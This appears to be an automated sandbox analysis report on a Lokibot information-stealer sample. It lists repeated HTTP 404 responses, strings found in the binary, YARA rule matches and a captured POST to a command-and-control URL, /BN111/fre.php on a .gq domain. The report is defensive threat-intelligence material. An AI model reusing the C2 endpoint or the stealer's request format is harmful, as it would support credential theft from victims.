Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:47 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tSBa4s2D4P4jpBx6UmblYjjTd9CZpovgF%2BPWqgNr38olq5O0aV%2BRwk6guUtz2KJcSkWnxUnrdqNk5vMbb8hVzaTtDOCB%2BcJpa1cxebjsNw2fxMN7oJxmUx78qf%2BG%2FL3VMFTIyyLXSMoDYeD9fnUR9J7qMZA67A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1584bd8d729-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:48 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9ZdGBK3Ox1p3BP97R4wYPo9%2BZ%2BK%2BUNVgFS7K2qZhwn3i65B5C5A3pC3HLkVBNXtwYCFsRF61IdHwby7cVDx52m03DlTnECOLo8Lmli9FT05kblnLTrBBndQTbweHp3wkkwehoYbNghK3zTDnn9Dwh%2FhMcQro9g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec15f58a805f1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:49 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VWWcbe3rqobGQ9zLXDZxDyBG75FOgSItYobuAtwDJpuAbL30zBatxbptze92UIC6gFoHQbenK4p440cH1CZduHVw9uJaoknjqoprxaW930U5gFR4LDNYtmvuhdpe4PmdBZYp9RJ3m58CjMFtKREDlk3%2FI4VSUQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1674b4c2c3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:51 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BsMAOCkH1sJ0oabis0Q4paNtyJNrES9QQwxvqkXvAl%2FY7%2BLQH8xSnKIcHV%2BPPogWaqk3yG%2FJ6vxc%2FEk34SqAVeWUDw7vDSJQdrJh0Hz27m7Tiv3u6y6ahjT5NNVAW4JRx6Ib5AME7x%2F0Mc2jzF8N3OMd71mu%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1774cc64e3d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:55 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LZ79cKido18sGHwuiNL%2F6O3gjFK34JZEyXZk1N8Qfy7pzHQIXqqquQIRfLJylWp%2Blb0ebXTVq%2F1bHmKtkJSRQAwrjU9cWyaKEY%2BfKI4BTUk6fnLRAUL796Gtr9VyUOxCK%2BmAyJmCSy2lit2HcTF7NC6%2BtJ15NA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1900cfd68ef-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:57 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLALdhBf343n2G8LZLoDwb6Mh5vWVGbC472SfDfdBH%2B1zblvJJUUdQJELnMb%2Bod0RSTtp3nexN46I4MemNvht6DC79ZyaLJ9Tj8z0PlQvLxyWkeCuuJUc6JQy22HYxAbvcclmEPUk4DRcOjj7k3c%2FCX8oeDUlg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1971aee4dbe-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:58 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pVTqfGYZG6lbiEUhHSdVmZCauemUr0Y%2BDwMOl8jQ0ldqgtA9xITilJs5vYZLZNEyT9OJN5kbjp%2BHOE4k2qqoAIe1jVhjQmKAUvsYFRYqMSmsNtQoFZ6LNXkpPSpmxGfDzqZFj4XqecgblbCCY5cS5zLZfkAuhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec19dfc3bdfcb-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:29:59 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gkjqA8qOHfmIDF%2B8y6qiYNfi%2BvKCn%2B9wfdd4HCP%2BYK0cnk28ajujXQRfcV4yPhPUB7cMD%2BZEx7KfsoCvsEDx9F1mGzxm8QL25QRC9D1NyirQW8VbFsNKnqSicUuJ0ck1LD6iO4oBLd%2BuJGOeJcZ4Ij1Vwl5I4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1a53d361f21-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:00 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iotQdWvLirTujDm5gcFSZO5hAVcZRC711g1iSDRI0%2Brb3822z%2BZAkRmuSDHdic5Uj57iNRI9xX3TN9YhS73pU0g3Awy8opYScVWOMDtQ3fUBF1pTWEZk13UdVN58f%2F5cQx2fm8PSSX%2BiO3wOmcduLTFZflpDzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1abfe1005b3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:01 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CiMowfP3p1ILABVXu8os0ZvSOz0H05YMNivh25CZUCDEqQaAY7dMsK8WCuL55RhExNK%2Bo6QnXW2OoiY91LV4aaKszjnsVP1HpaPN5F1rSwA%2BPDZXqH2LcFbJP9o0ixVca8u%2FnOqGjaVHkzJnEmiYU0ivx8ExBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1b2eb3f1f2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:02 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ga%2FiBjWS7EnclaPLKo1yPnxw%2BS5FfTFKHZyEfv8SBx7PLc2z9qVP39s4Ou2jxC%2Fu692YAeRobnrXUUs%2FH5lz44oFoe0MdOk11UK7d0oa85kJs8BzBG9Wn1TN%2BaAxNOIaqjCVMknge%2BA0NpNTHFqXMCVwFECLVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1b9fcbb4a6d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:03 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYEXv8S4QiPBTpXu0rf5bJXcJoQvbh8c7zrS9vvc7tBBFtqt%2FvJ59pUThsIsz8qJpgBGda1LHR3Qb02pkkKRC8u7P6%2BBRoVadCg8Od0Z6UP29X6bSAT1Hn6xm8BlysHdhvQ59Xz1U2tY28nHS%2BqgJgDxQY4HdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1c14c3ad6f5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:04 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yauK70pfnNL%2FJ90goDaRLF0fpdY6QkzTDmTkMnqaOy%2Bzsu%2BpC4W1kWkeLla6LwdlVBR9OMv4e4x9fXwxwON1%2FUNUz5VC3UtbTzqe0Ta8KCEmGddTn%2FYX5GbiYSC%2B8T4y3Jh3h%2FGtVWT8LEgia0f88sVfgxwueQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1c88f4e3258-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:06 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqfohRhEiuDGtoufJZoPIftug9rZXOY0iplMIhBxlnIZUjBXtab%2FI2jNrquCvC6cysFzwjayYPJM%2BQ8Xe4Icd2EQlB4ETqyyfmXIN7wgx7vriAXvx8gP%2BAmVX2ww%2FgOFnLGPHUENBicNBv5tAeMhrHNfgSR2tA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1cf4b1f63a7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:07 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eh8lR2VHuAd%2FabpYZW9tpbFbJtxx01L9yZN5vGSXcrxQt3sIQfCGSqyacaB9%2B3Hw2oVJwF7e7qyBl6EoN3hd1Wz7J66UUWTW97%2FegdbTRtYUGZPwPUIns9dbsm4VjmIJ9oYFMURDSLbk44n2badK3lPcW%2BIZzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1d6ad835bf5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:08 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M5tlpUopTFHdy2B09YRTb%2FcsTy7c1X2dY3sawEtin9CRp7iwQ7kHGGeqkAEUkgyYEQSHRIXi8G%2B0%2FPlXdk8CRXuTrtKeambiuJ5qPkn23PNVP4W0WpwprTjFbDp1IbPCTt%2F3Cd91aLWDrwa0e1cclMTu%2Brzvhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1decf8e5373-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:09 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gHyoRfXpo3hYuDnMEqyfZQc%2BSSKitG5uVBPt%2FzcNSAReJa%2FdnOJKlN8woQLzqA6DJAKzj%2BBAgAMnotpu0f8pMIviMGE3p2X%2FOL6fJxdXzYrzgTzXXn262LF8tX4wih8wIb1Yn%2F1EvqCxP1YMpsu0Nm4iCqvv%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1e69e5e4e50-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:11 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XYPD7fSpOyQ9pBkkU7r%2Fv6SPQi%2By9UIzK%2B1PLsu1iFdzjzfJxzg08bwcNFnidoj1OFoTBYyGcRQqcfhRC5k8KnU8iYCvp%2FGLncP9ixeP9Nbj206KsQTvNUsDuvNAU27cTMUZR%2BeQ6CClwmRmdofqKK5juL3eYA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1ef9dc84e2b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:13 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x2j5ZLeoHVLB0M3bMqX0PzaoLtVYEwCKEvGv1b3ZVT4MA7hLssUg4vrSoTR%2FE5D5SrSs6jQ1VXmZshZU40BlhiqRYtlB0oP0EeQEYcVIqQcXMEb13j5XLdZzrzFppZlNUH%2BxojLr5SNYRD263tyDlV%2Fqs9%2BBWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1fbbfb5beec-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:15 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIfWEe%2F6jyIr5T7SRE1AvZoCaCYM%2FbFVg7K%2BtIrH%2Bg2cqN5BZ7bF9LkzYb8H4TcHvLJGxjEene%2BEEAvpDhWU%2BAObyNoj5WQ%2FY8B2zI6QnfWVy2Mj3GhLDrM5%2B3ZllzuKto5k5eS%2FKyLRpb%2B6WFBaRW9j4UK%2F8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec209ed614e3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:16 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOgqfzVELnT4zNLoiR%2FSN41Qdg4UYQCVdsKnFsPBrdghsXz7OOBzVnpKSPLQWJtPGBZRxeNAZ9xU4Mal%2FMaGqsNeP9SMc6UxO7qEZCv8h9fhuYogsRPNLHTuEjgFMYjq%2FGbTIEqvZDq8c1MmmAw0PfhreX1fCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec2124acf0eb7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:18 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gxrVYDOVXCBXXewOH%2FJU78gmxBsZecNbyMCnQdhrynqYFCdLKoi%2BShuwRk3Wm6%2FFRdZt4dRQp2jPFEqfRpnLiPRvSx4RTqGet2X%2FOMvn5mcIBV960f5eIbfgCr3beNWQckv5%2F3qaZ1oRCAtM9L4XUXoBg8vx1A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec21c7f1e6964-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp	String found in binary or memory: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
Source: aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmp	String found in binary or memory: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpA
Source: aZOmps0Ug8.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: aZOmps0Ug8.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: aZOmps0Ug8.exe, aZOmps0Ug8.exe, 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

Source: unknown

HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 196Connection: close

Source: unknown

DNS traffic detected: queries for: 74f26d34ffff049368a6cff8812f86ee.gq

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 1_2_00404ED4 recv,

Source: C:\Users\user\Desktop\aZOmps0Ug8.exe

Code function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group

Source: aZOmps0Ug8.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
